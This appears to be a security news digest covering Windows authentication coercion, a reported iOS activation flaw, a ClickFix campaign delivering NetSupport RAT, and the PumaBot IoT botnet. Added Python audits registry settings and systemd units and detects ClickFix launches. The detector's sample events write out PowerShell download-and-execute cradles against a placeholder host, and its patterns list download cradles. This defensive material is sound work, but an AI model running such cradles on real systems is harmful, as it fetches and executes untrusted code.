Authentication Coercion in Windows: A Persistent and Growing Threat
Authentication coercion has become a persistent concern in Windows environments because it requires nothing more than a low-privileged domain account. By calling exposed RPC interfaces, an attacker coerces a targeted system, often a high-value server or a domain controller, into authenticating to an attacker-controlled host. The captured authentication is then relayed (NTLM relay, or Kerberos relay where the target accepts it) to another service, which can yield administrative access to that service or enable lateral movement across the network. These attacks have been observed in campaigns against misconfigured systems, particularly those still running default NTLM settings, which are common in legacy environments; and even where a specific coercion primitive has not been reported as exploited in the wild, tools like Coercer automate and accelerate the technique, putting it within reach of less capable threat actors. Successful exploitation can lead to domain escalation, after which attackers can steal credentials, move laterally, or take destructive action within the organization. Microsoft has acknowledged the threat and shipped several mitigations in Windows Server 2025 and Windows 11 24H2: SMB and LDAP signing, LDAP channel binding, and Extended Protection for Authentication (EPA), which defeat relays by cryptographically binding the authentication to the session and the messages exchanged over it. These protections are only enabled by default on fresh installations of those versions, so organizations running upgraded or older Windows remain exposed. Moreover, many environments still have NTLM enabled at all, which leaves a wide range of coercion and relay paths open regardless of OS version.
As the threat landscape evolves, understanding the specifics of authentication coercion and deploying appropriate defenses remains critical to protecting Windows environments.
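The mitigations listed above are mostly registry-backed, so the quickest way to see where a host stands is to dump the relevant keys with `reg query` and compare them against the enforcing values. The following is an added example for this digest, not code from Microsoft or any vendor it mentions: it parses `reg query` output and reports every control that is not enforced. The key paths and values it checks are the documented ones for SMB signing, LDAP signing and channel binding, NTLMv2-only, and outgoing NTLM restriction; EPA is configured per service (IIS, AD CS) and is not covered. The sample dump is constructed.

```python
"""Audit the Windows registry values behind the relay mitigations named above.

Added example for this digest, not code from Microsoft or any vendor it mentions.
It parses the text printed by `reg query <key>` (run on the host, redirected to a
file) and reports every mitigation that is not enforced. Extended Protection for
Authentication is configured per service (IIS, AD CS) and is not covered here.
SAMPLE_DUMP is constructed to look like a host with mixed settings.
"""
import re
from dataclasses import dataclass

# (key path, value name) -> (value that enforces the control, what it means).
# Key names are compared case-insensitively, as Windows does.
EXPECTED = {
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters",
     "RequireSecuritySignature"): (1, "SMB server signing required"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters",
     "RequireSecuritySignature"): (1, "SMB client signing required"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters",
     "LDAPServerIntegrity"): (2, "LDAP server signing required (domain controllers)"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters",
     "LdapEnforceChannelBinding"): (2, "LDAP channel binding always enforced (domain controllers)"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa",
     "LmCompatibilityLevel"): (5, "send NTLMv2 only, refuse LM and NTLM"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0",
     "RestrictSendingNTLMTraffic"): (2, "outgoing NTLM denied"),
}

# `reg query` prints the key path on its own line, then one indented line per value:
#     <name>    <REG_TYPE>    <data>
VALUE_LINE = re.compile(r"^\s+(\S.*?)\s{2,}(REG_[A-Z_]+)\s*(.*)$")


def parse_reg_query(text):
    """Map (key path, value name) to data for every value in `reg query` output."""
    values = {}
    current_key = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if line.startswith("HKEY_"):
            current_key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if m is None or current_key is None:
            continue
        name, vtype, data = m.group(1), m.group(2), m.group(3).strip()
        if vtype == "REG_DWORD" and data.lower().startswith("0x"):
            data = int(data, 16)          # reg query prints DWORDs as hex
        values[(current_key, name)] = data
    return values


@dataclass
class Finding:
    key: str
    name: str
    expected: int
    actual: object      # None when the value is absent, so the permissive default applies
    meaning: str


def audit_reg_dump(text):
    """Return a Finding for each mitigation in EXPECTED that the dump does not enforce."""
    present = {(k.lower(), n.lower()): v for (k, n), v in parse_reg_query(text).items()}
    findings = []
    for (key, name), (expected, meaning) in EXPECTED.items():
        actual = present.get((key.lower(), name.lower()))
        if actual != expected:
            findings.append(Finding(key, name, expected, actual, meaning))
    return findings


# Constructed sample: SMB client signing and LDAP channel binding are enforced,
# SMB server signing and LDAP signing are not, NTLMv2-only is not set, and the
# MSV1_0 key (outgoing NTLM restriction) is absent altogether.
SAMPLE_DUMP = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
    RequireSecuritySignature    REG_DWORD    0x0
    EnableSecuritySignature    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters
    RequireSecuritySignature    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
    LDAPServerIntegrity    REG_DWORD    0x1
    LdapEnforceChannelBinding    REG_DWORD    0x2

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    LmCompatibilityLevel    REG_DWORD    0x3
"""

if __name__ == "__main__":
    for f in audit_reg_dump(SAMPLE_DUMP):
        state = "absent" if f.actual is None else str(f.actual)
        print(f"NOT ENFORCED: {f.name} = {state} (want {f.expected}): {f.meaning}\n    at {f.key}")
```

One caveat when reading the output: an absent value means the platform default applies, and that default differs by role. On a domain controller the LanmanServer signing default is already "required", so an absent RequireSecuritySignature there should be confirmed with `Get-SmbServerConfiguration` rather than treated as a gap; on member servers and workstations older than 24H2/Server 2025 the default is the permissive one, which is exactly the exposure the item describes.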
Flaw in Apple iOS Activation Infrastructure Exposes Devices to Persistent Tampering
A significant flaw has been reported in Apple's iOS activation infrastructure, tested against the iOS 18.5 stable release from May 2025, that could expose millions of Apple devices. The reported weakness lies in the activation endpoint (hXXps://humb[.]apple[.]com/humbug/baa), which is said to process unauthenticated XML payloads during device setup. An attacker who can inject malformed XML, with neither authentication nor signature verification in the way, could alter device configuration during the initial setup phase. The endpoint reportedly returns no error feedback on such input, which makes unauthorized changes hard for users or Apple's monitoring to detect. In that scenario devices would be exposed to pre-activation tampering: persistent profiles could be implanted, or settings such as network policies or MDM configuration modified, without the user's knowledge. The flaw was described in a report published on Substack, whose author concluded from extensive testing that the activation server lacks basic controls, including signature verification and input validation, and so would allow injection of custom provisioning logic. According to the report, exploitation requires neither physical access to the device nor a jailbreak, so a malicious access point or rogue provisioning server on the setup path would suffice, which is what makes the vector concerning. There is no official confirmation from Apple and no CVE has been assigned, but the potential for widespread impact is troubling, especially for enterprises that depend on secure provisioning. Apple has not responded to requests for comment or acknowledged the flaw, so the issue remains unresolved. The report concerns devices running iOS 18.5 and does not cover macOS; no official patch or workaround is currently available.
Without an official fix, users and organizations are advised to tighten network security, avoid untrusted networks during device setup, and monitor for unusual device behavior after activation.
Multi-Stage PowerShell Campaign Delivers NetSupport RAT via Fake Websites
A multi-stage campaign has been uncovered that uses fake websites posing as legitimate services, including Gitcode and DocuSign, to deliver the NetSupport RAT. It begins with phishing emails or social media posts that steer victims to the counterfeit sites. There, users are tricked into executing a PowerShell command through the Windows Run dialog; that command downloads further PowerShell scripts, which eventually install NetSupport RAT on the machine. Splitting the download across several stages makes the chain harder to detect and harder for defenders to reconstruct end to end. The sites use clipboard poisoning to silently place the malicious command on the user's clipboard and then instruct the user to paste and run it. Impersonating services people already trust, such as Gitcode and DocuSign, is a standard social engineering choice. The fake sites identified by DomainTools host their scripts on subdomains such as docusign.sa[.]com and present a ClickFix-style CAPTCHA asking visitors to prove they are not robots; once that step is "completed", the victim is told to paste the PowerShell command into the Run dialog, which executes it and pulls down the next payload. In the first stage, a PowerShell script establishes persistence using a file called "wbdims[.]exe", which was hosted on GitHub at the time of the attack; subsequent scripts retrieve payloads from external servers and finish with the installation of NetSupport RAT. DomainTools linked the campaign to the SocGholish threat group based on similarities in delivery URLs, domain naming, and registration patterns.
NetSupport Manager, the legitimate remote administration tool abused here, has been repurposed as a Remote Access Trojan (RAT) by several threat groups, including FIN7 and Storm-0408. The campaign illustrates the growing reliance on deceptive websites and social engineering to compromise users and organizations.
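The one telemetry point every stage of this chain passes through is a PowerShell process started from the Run dialog, so its parent is explorer.exe and its command line carries a download cradle, either in clear text or behind -EncodedCommand. The following is an added example for this digest, not code from DomainTools or from the campaign it describes: a detector over process-creation events carrying the ParentImage, Image and CommandLine fields that Sysmon Event ID 1 and Security Event ID 4688 both provide. The sample events are constructed, and the URLs in them are placeholders rather than real campaign infrastructure.

```python
"""Spot ClickFix-style PowerShell launches in process-creation telemetry.

Added example for this digest, not code from DomainTools or the campaign it
describes. Each event carries the ParentImage, Image and CommandLine fields
that Sysmon Event ID 1 and Security Event ID 4688 both provide; SAMPLE_EVENTS
are constructed, and the URLs in them are placeholders rather than real
campaign infrastructure. The detector decodes -EncodedCommand payloads so a
download cradle hidden in base64 is scored the same as one in clear text.
"""
import base64
import re

CRADLE_PATTERNS = [re.compile(p, re.I) for p in (
    r"\biwr\b", r"\birm\b", r"invoke-webrequest", r"invoke-restmethod",
    r"\biex\b", r"invoke-expression", r"downloadstring", r"downloadfile",
    r"net\.webclient", r"start-bitstransfer",
)]
EVASION_PATTERNS = [re.compile(p, re.I) for p in (
    r"-w(?:indowstyle)?\s+h(?:idden)?\b", r"-nop(?:rofile)?\b",
    r"-e(?:xecutionpolicy|p)\s+bypass", r"-noni(?:nteractive)?\b",
)]
# -e, -ec, -enc, ... are all accepted abbreviations of -EncodedCommand; -ep is not.
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_event(event):
    """Return the set of ClickFix indicators present in one process-creation event."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return set()
    cmdline = event.get("CommandLine", "")
    tags = set()
    if event.get("ParentImage", "").lower().endswith("explorer.exe"):
        tags.add("explorer-parent")       # Run dialog, or a shell the user opened from Explorer
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.add("encoded")
    searchable = cmdline + "\n" + (decoded or "")
    if any(p.search(searchable) for p in CRADLE_PATTERNS):
        tags.add("cradle")
    if any(p.search(cmdline) for p in EVASION_PATTERNS):
        tags.add("evasion")
    return tags


def detect_clickfix(events):
    """Alert on PowerShell started from explorer.exe that fetches or decodes code to run."""
    alerts = []
    for event in events:
        tags = classify_event(event)
        if "explorer-parent" in tags and tags & {"cradle", "encoded"}:
            alerts.append((event, tags))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"
    .encode("utf-16le")).decode()

# Constructed events: a scheduled admin script, a clear-text ClickFix paste, an
# encoded ClickFix paste, and a user simply opening a PowerShell console.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -w hidden -nop -c \"iex (iwr 'https://example.invalid/verify' -UseBasicParsing)\""},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": f"powershell.exe -EncodedCommand {ENCODED_PAYLOAD}"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for event, tags in detect_clickfix(SAMPLE_EVENTS):
        print(f"ALERT {sorted(tags)}: {event['CommandLine'][:80]}")
```

Two corroborating artifacts are worth pulling when this fires: the Run dialog records what was pasted under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and PowerShell script block logging (Event ID 4104) captures the decoded content of every stage, including the scripts the first command downloads.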
PumaBot IoT Botnet Targets Vulnerable Linux Devices with Sophisticated Techniques for Cryptocurrency Mining
PumaBot, a new Linux-based botnet, has emerged as a significant threat to organizations running Internet of Things (IoT) devices, especially in sectors that depend on surveillance systems. Unlike typical botnets that scan the internet indiscriminately for vulnerable hosts, PumaBot takes a more targeted approach, retrieving curated lists of IP addresses from its command-and-control servers. This lets it concentrate on specific vulnerable devices and reduces the chance of tripping security systems designed to flag mass scanning. Researchers at PolySwarm identified the botnet, which specifically targets Linux devices, with a notable focus on surveillance and traffic camera systems, including those manufactured by Pumatronix. PumaBot compromises devices by brute-forcing SSH credentials, so organizations that leave default passwords in place are the most exposed. Once it gains access, it sets up persistence: the malware installs itself in system directories, including /lib/redis, and mimics legitimate services by creating system service files named after common applications such as Redis and MySQL, so that it restarts automatically after a reboot. It also collects system details, including operating system, kernel version, and architecture, and sends them back to the command-and-control servers. PumaBot's primary goal appears to be cryptocurrency mining: the malware executes commands such as "xmrig" and "networkxm" to hijack computing resources for illicit profit. The botnet underscores the growing risk across the IoT ecosystem, where weak security and default credentials make devices prime targets for cybercriminals.
To reduce this risk, organizations should change default passwords, enforce strong SSH authentication (keys rather than passwords where the device allows it), and monitor network traffic for unusual activity from devices a botnet like PumaBot could compromise.
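The persistence technique described above leaves a checkable inconsistency: a service unit carries the name of a well-known daemon, but its ExecStart points at a binary in a directory that daemon's package never installs into (here, /lib/redis). The following is an added example for this digest, not code from PolySwarm or any vendor it names, that audits unit files for exactly that mismatch. The allowed directories are an assumption based on common Debian and RHEL layouts, and the sample units are constructed.

```python
"""Find systemd units that borrow a well-known daemon's name but run a binary from
somewhere that daemon's package never installs it, the persistence trick the item
above attributes to PumaBot (units named after Redis or MySQL, payload under /lib/redis).

Added example for this digest, not code from PolySwarm or any vendor it names.
The allowed directories are an assumption based on common Debian and RHEL
layouts; SAMPLE_UNITS are constructed. In production, read the unit texts from
/etc/systemd/system and /usr/lib/systemd/system instead of the dict below.
"""
import os
import re
import shlex

# Daemon name prefix -> directories where distribution packages put its binary.
KNOWN_DAEMON_DIRS = {
    "redis": {"/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/local/bin"},
    "mysql": {"/usr/bin", "/usr/sbin", "/usr/libexec", "/bin", "/sbin", "/usr/local/bin"},
    "mariadb": {"/usr/bin", "/usr/sbin", "/usr/libexec", "/bin", "/sbin", "/usr/local/bin"},
}
# [ \t]* rather than \s* so a bare 'ExecStart=' line cannot swallow the next line.
EXEC_LINE = re.compile(r"^[ \t]*ExecStart[ \t]*=[ \t]*(.*)$", re.M)
EXEC_PREFIXES = "-@+!:"      # systemd allows these before the path, e.g. ExecStart=-/usr/bin/x


def exec_start_binaries(unit_text):
    """Return the executable path from every ExecStart= line, honouring resets."""
    binaries = []
    for m in EXEC_LINE.finditer(unit_text):
        value = m.group(1).strip()
        if not value:            # bare 'ExecStart=' clears earlier assignments
            binaries.clear()
            continue
        argv = shlex.split(value)
        if argv:
            binaries.append(argv[0].lstrip(EXEC_PREFIXES))
    return binaries


def impersonated_daemon(unit_name):
    """Return the well-known daemon a unit name claims to be (redis, mysql, ...), or None."""
    stem = unit_name.lower().removesuffix(".service")
    for daemon in KNOWN_DAEMON_DIRS:
        if stem.startswith(daemon):      # matches redis, redis-server, mysql, mysqld, mariadb
            return daemon
    return None


def audit_units(units):
    """units: {unit file name: unit text}. Returns (unit, binary, reason) for each suspect."""
    findings = []
    for name, text in units.items():
        daemon = impersonated_daemon(name)
        if daemon is None:
            continue                      # unknown units are not judged here
        for binary in exec_start_binaries(text):
            if os.path.dirname(binary) not in KNOWN_DAEMON_DIRS[daemon]:
                findings.append((name, binary,
                                 f"{name} claims to be {daemon} but runs {binary} outside the package directories"))
    return findings


# Constructed units: a genuine redis unit, a PumaBot-style fake redis unit, a fake mysql
# unit pointing into the same malware directory, and an unrelated unit that is left alone.
SAMPLE_UNITS = {
    "redis-server.service": "[Unit]\nDescription=Advanced key-value store\n\n[Service]\n"
                            "ExecStart=/usr/bin/redis-server /etc/redis/redis.conf\n",
    "redis.service": "[Service]\nExecStart=/lib/redis/redis-server\nRestart=always\n\n"
                     "[Install]\nWantedBy=multi-user.target\n",
    "mysql.service": "[Service]\nExecStart=/lib/redis/mysql\nRestart=always\n",
    "ssh.service": "[Service]\nExecStart=/usr/sbin/sshd -D $SSHD_OPTS\n",
}

if __name__ == "__main__":
    for unit, binary, reason in audit_units(SAMPLE_UNITS):
        print(f"SUSPECT {unit}: {reason}")
```

A hit is confirmed by asking the package manager who owns the binary (`dpkg -S /lib/redis/redis-server` or `rpm -qf ...`): a daemon binary that no package claims, in a directory that a real Redis or MySQL install never uses, is the malware's own drop rather than a local customisation.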